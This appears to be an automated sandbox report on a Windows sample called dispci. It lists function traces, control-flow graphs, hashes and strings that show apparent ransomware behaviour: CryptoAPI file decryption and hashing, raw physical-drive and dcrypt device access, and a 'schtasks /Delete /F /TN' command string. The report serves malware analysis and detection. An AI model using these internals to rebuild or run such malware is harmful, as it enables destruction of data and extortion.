                                              • API ID: Create$File$AttributesCloseConsoleCtrlDirectoryEnvironmentEventHandleHandlerObjectProcessSingleSleepSystemValueVariableWait_vswprintf_slstrcat
                                              • String ID: -id$rhaegal$schtasks /Delete /F /TN %ws
                                              • API String ID: 2413411667-2713465884
                                              • Opcode ID: 151c304ad146a7434413f460ae69ec86238b1de35c711d1d0b8232fce6b8ebb6
                                              • Instruction ID: 33acbc2806c8cdc35d498b9cc5de2834a8cf4a975dcff28de1ef54beade3fd84
                                              • Opcode Fuzzy Hash: 151c304ad146a7434413f460ae69ec86238b1de35c711d1d0b8232fce6b8ebb6
                                              • Instruction Fuzzy Hash: 63310770E40704AAEF20FBB49D4BBAA7365AF20700F9489A5FD059B1D2EA71DE448750
                                              Function 00A852D0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 55fileCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 128 a852d0-a852e8 GetFileAttributesW 129 a852ea-a85306 CreateFileW 128->129 130 a8533b-a85342 call a842a0 128->130 129->130 131 a85308-a85325 CloseHandle CreateFileW 129->131 136 a8534e-a8535c call a821f0 130->136 137 a85344 130->137 131->130 133 a85327-a85339 TlsSetValue call a847e0 131->133 133->130 141 a8535e-a85360 136->141 142 a85367-a8536c 136->142 137->136 141->142
                                              APIs
                                              • GetFileAttributesW.KERNELBASE(C:\Windows\cscc.dat), ref: 00A852DF
                                              • CreateFileW.KERNELBASE(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00A85301
                                              • CloseHandle.KERNEL32(00000000), ref: 00A85309
                                              • CreateFileW.KERNEL32(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00A85320
                                              • TlsSetValue.KERNEL32(?,00000000), ref: 00A8532E
                                                • Part of subcall function 00A847E0: FindFirstVolumeW.KERNEL32(?,00000104), ref: 00A84802
                                                • Part of subcall function 00A847E0: FindNextVolumeW.KERNEL32(?,?,00000104), ref: 00A84889
                                                • Part of subcall function 00A847E0: GetLastError.KERNEL32 ref: 00A8488B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: File$CreateFindVolume$AttributesCloseErrorFirstHandleLastNextValue
                                              • String ID: C:\Windows\cscc.dat$\\.\dcrypt
                                              • API String ID: 893940839-3761405209
                                              • Opcode ID: 2c3821422c06c3e0936eba70ee6ca48f73759d4fcee32d25ef722a2d081648bd
                                              • Instruction ID: 69da5e490a6b9dbcece3354abf155df845ce4505a0d269b26b04e95187d0f37d
                                              • Opcode Fuzzy Hash: 2c3821422c06c3e0936eba70ee6ca48f73759d4fcee32d25ef722a2d081648bd
                                              • Instruction Fuzzy Hash: BA01AC31BC5B0035E920B7B8AC1BF9536989B05B70F741711FB25EE1E0EAE065074759
                                              Function 00A83D00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 56fileCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 150 a83d00-a83d23 TlsGetValue 151 a83d4c-a83d66 DeviceIoControl 150->151 152 a83d25-a83d3c CreateFileW 150->152 153 a83d6e-a83d7b 151->153 155 a83d68 GetLastError 151->155 152->153 154 a83d3e-a83d46 TlsSetValue 152->154 156 a83d80-a83d85 153->156 154->151 155->153 156->156 157 a83d87-a83d90 156->157
                                              APIs
                                              • TlsGetValue.KERNEL32(?), ref: 00A83D19
                                              • CreateFileW.KERNELBASE(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00A83D31
                                              • TlsSetValue.KERNEL32(?,00000000), ref: 00A83D46
                                              • DeviceIoControl.KERNEL32(00000000,00220020,01490000,00000000,00000000,00000000,?,00000000), ref: 00A83D5E
                                              • GetLastError.KERNEL32 ref: 00A83D68
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: Value$ControlCreateDeviceErrorFileLast
                                              • String ID: \\.\dcrypt
                                              • API String ID: 2163648868-1945893055
                                              • Opcode ID: bdca5c83754d58616d8c84cfddf14f384121ef17b6c3fe400bb4d0b90c17feb6
                                              • Instruction ID: cc15a10cc37f198efc8c4adbf6bcd2e75a85aab182eff3c3165bebb6c261f535
                                              • Opcode Fuzzy Hash: bdca5c83754d58616d8c84cfddf14f384121ef17b6c3fe400bb4d0b90c17feb6
                                              • Instruction Fuzzy Hash: 0E014077701210BFEE20EBDAAC49F673B7CE759B21F11050AFA05D72A0DA605E0287E1
                                              Function 00A821F0 Relevance: 3.1, APIs: 2, Instructions: 58COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 158 a821f0-a82208 159 a82210-a82225 158->159 159->159 160 a82227-a8225e TlsGetValue DeviceIoControl 159->160 161 a8228f 160->161 162 a82260-a82265 160->162 163 a82294-a822a2 call a85c9f 161->163 162->163 164 a82267-a8226f 162->164 165 a82271-a8227e 164->165 165->165 167 a82280-a8228e call a85c9f 165->167
                                              APIs
                                              • TlsGetValue.KERNEL32(?,00220040,?,00000298,?,00000298,?,00000000), ref: 00A8224F
                                              • DeviceIoControl.KERNELBASE(00000000), ref: 00A82256
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: ControlDeviceValue
                                              • String ID:
                                              • API String ID: 4261377879-0
                                              • Opcode ID: ede095add9c6b2348f312264f5c1a65e90b19d38232eb9efd4e2d1077d6d81c3
                                              • Instruction ID: 93fc0ec7ba43a1f62172b25e7162f05a6a6c2e12b804207e0e62ce1700da4741
                                              • Opcode Fuzzy Hash: ede095add9c6b2348f312264f5c1a65e90b19d38232eb9efd4e2d1077d6d81c3
                                              • Instruction Fuzzy Hash: 2311AC31B002199BDB14EBB8D846BBA73B8EF49310F4005A9EC0A97280EE74AE05C750
                                              Function 00A87D0C Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 171 a87d0c-a87d1d call a87ce1 ExitProcess
                                              APIs
                                              • ___crtCorExitProcess.LIBCMT ref: 00A87D14
                                                • Part of subcall function 00A87CE1: GetModuleHandleW.KERNEL32(mscoree.dll,?,00A87D19,?,?,00A85EB5,000000FF,0000001E,00000001,00000000,00000000,?,00A8B13B,?,00000001,?), ref: 00A87CEB
                                                • Part of subcall function 00A87CE1: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00A87CFB
                                              • ExitProcess.KERNEL32 ref: 00A87D1D
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: ExitProcess$AddressHandleModuleProc___crt
                                              • String ID:
                                              • API String ID: 2427264223-0
                                              • Opcode ID: fac0e1d54fb0d6d247fa2760fe8786e62d5f8c7c5aaf98c76a843c9698c08f61
                                              • Instruction ID: 50f9ece7008283788e54aa371bb85c53dcf68d4775789a1e3ada92e20a630653
                                              • Opcode Fuzzy Hash: fac0e1d54fb0d6d247fa2760fe8786e62d5f8c7c5aaf98c76a843c9698c08f61
                                              • Instruction Fuzzy Hash: DBB09232004108BBCF013F52DE0A84D3F2AEB803A0B614022F8180A031DF72EEA3AA80
                                              Function 00A84223 Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 188 a84223-a8422a 189 a84230-a8424b 188->189 190 a8424d-a84252 call a83d00 189->190 191 a84257-a8425e 189->191 190->191 191->189 193 a84260-a8426b 191->193 195 a84270-a84275 193->195 195->195 196 a84277-a84283 EnumWindows call a83d00 195->196 198 a84288-a84296 call a85c9f 196->198
                                              APIs
                                              • EnumWindows.USER32(Function_00003DF0,00000117), ref: 00A8427D
                                                • Part of subcall function 00A83D00: TlsGetValue.KERNEL32(?), ref: 00A83D19
                                                • Part of subcall function 00A83D00: CreateFileW.KERNELBASE(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00A83D31
                                                • Part of subcall function 00A83D00: TlsSetValue.KERNEL32(?,00000000), ref: 00A83D46
                                                • Part of subcall function 00A83D00: DeviceIoControl.KERNEL32(00000000,00220020,01490000,00000000,00000000,00000000,?,00000000), ref: 00A83D5E
                                                • Part of subcall function 00A83D00: GetLastError.KERNEL32 ref: 00A83D68
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: Value$ControlCreateDeviceEnumErrorFileLastWindows
                                              • String ID:
                                              • API String ID: 1452533794-0
                                              • Opcode ID: 966b3795baccfca5ea195a23e89f7c7e22d6bc41bc0bc1ebced9dc9529f9d5b5
                                              • Instruction ID: 79e27f9f45170d2d0b55585a8e272fb94bb4c44715d1497d774abb586844c7b8
                                              • Opcode Fuzzy Hash: 966b3795baccfca5ea195a23e89f7c7e22d6bc41bc0bc1ebced9dc9529f9d5b5
                                              • Instruction Fuzzy Hash: C2F0E930B041098FDF15FFA0E9867E93770EB1D300F0104AEE8468B2A2EE201D468BD1
                                              Function 00A87F64 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 201 a87f64-a87f70 call a87e24 203 a87f75-a87f79 201->203
                                              APIs
                                              • _doexit.LIBCMT ref: 00A87F70
                                                • Part of subcall function 00A87E24: __lock.LIBCMT ref: 00A87E32
                                                • Part of subcall function 00A87E24: RtlDecodePointer.NTDLL(00A95CF0), ref: 00A87E6E
                                                • Part of subcall function 00A87E24: RtlDecodePointer.NTDLL ref: 00A87E7F
                                                • Part of subcall function 00A87E24: RtlDecodePointer.NTDLL(-00000004), ref: 00A87EA5
                                                • Part of subcall function 00A87E24: RtlDecodePointer.NTDLL ref: 00A87EB8
                                                • Part of subcall function 00A87E24: RtlDecodePointer.NTDLL ref: 00A87EC2
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: DecodePointer$__lock_doexit
                                              • String ID:
                                              • API String ID: 3343572566-0
                                              • Opcode ID: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
                                              • Instruction ID: f8496ef12f0e5019f8b65fbc66dad5ae5c8fd617e4762ad53e118ec6a9953830
                                              • Opcode Fuzzy Hash: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
                                              • Instruction Fuzzy Hash: FEB0923258420833DA202542AC03F0A3A4987C1B60E2400A0BA0C195A1A9A2AD618189

                                              Non-executed Functions

                                              Function 00A82800 Relevance: 38.9, APIs: 19, Strings: 3, Instructions: 433COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00A839E0: __snwprintf.LIBCMT ref: 00A83A0A
                                                • Part of subcall function 00A839E0: _malloc.LIBCMT ref: 00A83A11
                                                • Part of subcall function 00A839E0: CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,?,00000000,00000000), ref: 00A83A39
                                                • Part of subcall function 00A839E0: _free.LIBCMT ref: 00A83AD6
                                              • CloseHandle.KERNEL32 ref: 00A82A65
                                              • _free.LIBCMT ref: 00A82A6C
                                              • _free.LIBCMT ref: 00A82A7F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: _free$CloseCreateFileHandle__snwprintf_malloc
                                              • String ID: $@$EXEFILE
                                              • API String ID: 798375799-665770621
                                              • Opcode ID: 346071e2e13e291f44c16ca6607a9cca3e8607a024cf5e20502440dbe99fe6f7
                                              • Instruction ID: b11e9c0f5453b98eeb2420ed7c5db706c3f18605d48ec994868e54f0e8fbe9e5
                                              • Opcode Fuzzy Hash: 346071e2e13e291f44c16ca6607a9cca3e8607a024cf5e20502440dbe99fe6f7
                                              • Instruction Fuzzy Hash: 47E1D8B2F012149BDF34EF64CD84BBEB3B5EF84350F1941A9E919A7241D6709E82CB94
                                              Function 00A819F0 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 152fileencryptionCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CryptDuplicateKey.ADVAPI32(?,00000000,00000000,?), ref: 00A81A11
                                              • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 00A81A2E
                                              • GetFileSizeEx.KERNEL32(00000000,?), ref: 00A81A71
                                              • CreateFileMappingW.KERNEL32(00000000,00000000,00000004,00000000,?,00000000), ref: 00A81AB3
                                              • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,?), ref: 00A81ACA
                                              • CryptDecrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,?), ref: 00A81AE7
                                              • FlushViewOfFile.KERNEL32(00000000,?), ref: 00A81AF6
                                              • _wprintf.LIBCMT ref: 00A81B05
                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 00A81B0E
                                              • CloseHandle.KERNEL32(00000000), ref: 00A81B15
                                              • CloseHandle.KERNEL32(00000000), ref: 00A81B46
                                              • CryptDestroyKey.ADVAPI32(?), ref: 00A81B50
                                              • SetEvent.KERNEL32(?), ref: 00A81B6A
                                              • SetEvent.KERNEL32(?), ref: 00A81B74
                                                • Part of subcall function 00A81810: CryptDuplicateHash.ADVAPI32(?,00000000,00000000,?), ref: 00A818D9
                                                • Part of subcall function 00A81810: CryptHashData.ADVAPI32(00000000,?,00000004,00000000), ref: 00A818F3
                                                • Part of subcall function 00A81810: LocalAlloc.KERNEL32(00000040,?), ref: 00A8190A
                                                • Part of subcall function 00A81810: CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 00A81927
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: CryptFile$HashView$CloseCreateDuplicateEventHandle$AllocDataDecryptDestroyFlushLocalMappingParamSizeUnmap_wprintf
                                              • String ID: %lS OK
                                              • API String ID: 2843717376-683714924
                                              • Opcode ID: 4787e10ad020c9c50515fb5d5f58d1a8a843b7421451b836df357da919f23669
                                              • Instruction ID: 76e7dd796c4323bc4f4a386a52207280eb5d5e0a260b2438049e1b18519806f6
                                              • Opcode Fuzzy Hash: 4787e10ad020c9c50515fb5d5f58d1a8a843b7421451b836df357da919f23669
                                              • Instruction Fuzzy Hash: CC514476A00109BFDF10DFA4DC88ABEB77DFB48751F14411AF915A7250EB70AE428B60
                                              Function 00A81810 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 176encryptionmemoryCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00A81710: GetFileSizeEx.KERNEL32(?,?), ref: 00A81723
                                                • Part of subcall function 00A81710: LocalAlloc.KERNEL32(00000040,?,?,?), ref: 00A81744
                                                • Part of subcall function 00A81710: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,?,?), ref: 00A8175D
                                                • Part of subcall function 00A81710: ReadFile.KERNEL32(?,?,?,?,00000000,?,?,?,00000000,00000000,?,?,?), ref: 00A81779
                                              • CryptDuplicateHash.ADVAPI32(?,00000000,00000000,?), ref: 00A818D9
                                              • CryptHashData.ADVAPI32(00000000,?,00000004,00000000), ref: 00A818F3
                                              • LocalAlloc.KERNEL32(00000040,?), ref: 00A8190A
                                              • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 00A81927
                                              • LocalFree.KERNEL32(00000000), ref: 00A819AE
                                              • CryptDestroyHash.ADVAPI32(00000000), ref: 00A819B8
                                              • LocalFree.KERNEL32(?), ref: 00A819C2
                                              • LocalFree.KERNEL32(?), ref: 00A819DD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: Local$CryptHash$FileFree$Alloc$DataDestroyDuplicateParamPointerReadSize
                                              • String ID: encrypted
                                              • API String ID: 1377777459-1467498611
                                              • Opcode ID: a4530142f2b8188932a3d8a104310daab2fcc89430a410b643ee956a5126729e
                                              • Instruction ID: be384e2ab37e3aa317a3c0e3c35a3202038fabf8191c9057d228e92f1e3f74fe
                                              • Opcode Fuzzy Hash: a4530142f2b8188932a3d8a104310daab2fcc89430a410b643ee956a5126729e
                                              • Instruction Fuzzy Hash: 08512772F001119BDB24EF79C890A7DBFB9AF85300F1845A6EA85DB281DA31DE42CB50
                                              Function 00A81E40 Relevance: 15.1, APIs: 10, Instructions: 88encryptionCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00A81E4C
                                              • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000), ref: 00A81E77
                                              • GetLastError.KERNEL32 ref: 00A81E7D
                                              • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,00000008), ref: 00A81E93
                                              • CryptDestroyHash.ADVAPI32(?), ref: 00A81ED6
                                              • CryptDestroyKey.ADVAPI32(?), ref: 00A81EE0
                                              • CryptDestroyKey.ADVAPI32 ref: 00A81EE9
                                              • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00A81EF4
                                              • CloseHandle.KERNEL32(?,?,00000000), ref: 00A81EFE
                                              • LocalFree.KERNEL32(?), ref: 00A81F18
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: Crypt$ContextDestroy$Acquire$CloseCreateErrorEventFreeHandleHashLastLocalRelease
                                              • String ID:
                                              • API String ID: 1700672282-0
                                              • Opcode ID: 506f517ba31b91e44fb6a1afea9d792807722ddcceecf44b0093395afc9891f0
                                              • Instruction ID: 19a26dc61128fb0cccb2abb329a7cd92b2c627b2f1663ceeb2f5c204e258158c
                                              • Opcode Fuzzy Hash: 506f517ba31b91e44fb6a1afea9d792807722ddcceecf44b0093395afc9891f0
                                              • Instruction Fuzzy Hash: 71217C75340701ABEB20EBA59C85F6777BCAF48741F104419FA02D6591DF61E9028B64
                                              Function 00A81080 Relevance: 13.6, APIs: 9, Instructions: 101encryptionmemoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00A810A4
                                              • LocalAlloc.KERNEL32(00000040,?,?,00000000,00000001,00000000,?,00000000,00000000), ref: 00A810B4
                                              • CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00A810D2
                                              • CryptDecodeObjectEx.CRYPT32(00000001,00000008,00000000,?,00000000,00000000,00000000,?), ref: 00A810F8
                                              • LocalAlloc.KERNEL32(00000040,00000000,?,00000000,00000001,00000000,?,00000000,00000000,?,00000000,00000001,00000000,?,00000000,00000000), ref: 00A81104
                                              • CryptDecodeObjectEx.CRYPT32(00000001,00000008,00000000,?,00000000,00000000,00000000,00000000), ref: 00A81122
                                              • CryptImportPublicKeyInfo.CRYPT32(00000000,00000001,00000000,?), ref: 00A81133
                                              • LocalFree.KERNEL32(00000000,?,00000000,00000001,00000000,?,00000000,00000000,?,00000000,00000001,00000000,?,00000000,00000000), ref: 00A8113D
                                              • LocalFree.KERNEL32(00000000,?,00000000,00000001,00000000,?,00000000,00000000,?,00000000,00000001,00000000,?,00000000,00000000), ref: 00A81144
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: Crypt$Local$AllocBinaryDecodeFreeObjectString$ImportInfoPublic
                                              • String ID:
                                              • API String ID: 3940947887-0
                                              • Opcode ID: d907c4cf2c2f0f927c79ae1564d8f75003c64bb4c1681fc009221de9d7455cd6
                                              • Instruction ID: e92fd3a1ef10400480132e7aa7c70b3d3f3a29d83a44ea768c47158bc3477958
                                              • Opcode Fuzzy Hash: d907c4cf2c2f0f927c79ae1564d8f75003c64bb4c1681fc009221de9d7455cd6
                                              • Instruction Fuzzy Hash: 03216136B40215BBEB20DBD5DC89FEFBB7CEB45B50F104156FA04A6280DAB09E4187A4
                                              Function 00A839E0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 91fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • __snwprintf.LIBCMT ref: 00A83A0A
                                              • _malloc.LIBCMT ref: 00A83A11
                                                • Part of subcall function 00A85E86: __FF_MSGBANNER.LIBCMT ref: 00A85E9F
                                                • Part of subcall function 00A85E86: __NMSG_WRITE.LIBCMT ref: 00A85EA6
                                                • Part of subcall function 00A85E86: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,00A8B13B,?,00000001,?,?,00A89441,00000018,00A95D10,0000000C,00A894D1), ref: 00A85ECB
                                              • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,?,00000000,00000000), ref: 00A83A39
                                              • DeviceIoControl.KERNEL32(00000000,00070000,00000000,00000000,?,00000018,?,00000000), ref: 00A83A6F
                                              • _free.LIBCMT ref: 00A83AD6
                                                • Part of subcall function 00A85E4C: HeapFree.KERNEL32(00000000,00000000,?,00A8A0A7,00000000,?,00A8B13B,?,00000001,?,?,00A89441,00000018,00A95D10,0000000C,00A894D1), ref: 00A85E62
                                                • Part of subcall function 00A85E4C: GetLastError.KERNEL32(00000000,?,00A8A0A7,00000000,?,00A8B13B,?,00000001,?,?,00A89441,00000018,00A95D10,0000000C,00A894D1,?), ref: 00A85E74
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: Heap$AllocControlCreateDeviceErrorFileFreeLast__snwprintf_free_malloc
                                              • String ID: \\.\PhysicalDrive%d
                                              • API String ID: 2774441620-2935326385
                                              • Opcode ID: 240e48fa602aaa6338b1c56740e5fef8bca21e33127b0852a33cb3008d131ac2
                                              • Instruction ID: e8c52478663c4cc016e452d91a0f0c501de8587f5315a5f39b78301b1fd948e6
                                              • Opcode Fuzzy Hash: 240e48fa602aaa6338b1c56740e5fef8bca21e33127b0852a33cb3008d131ac2
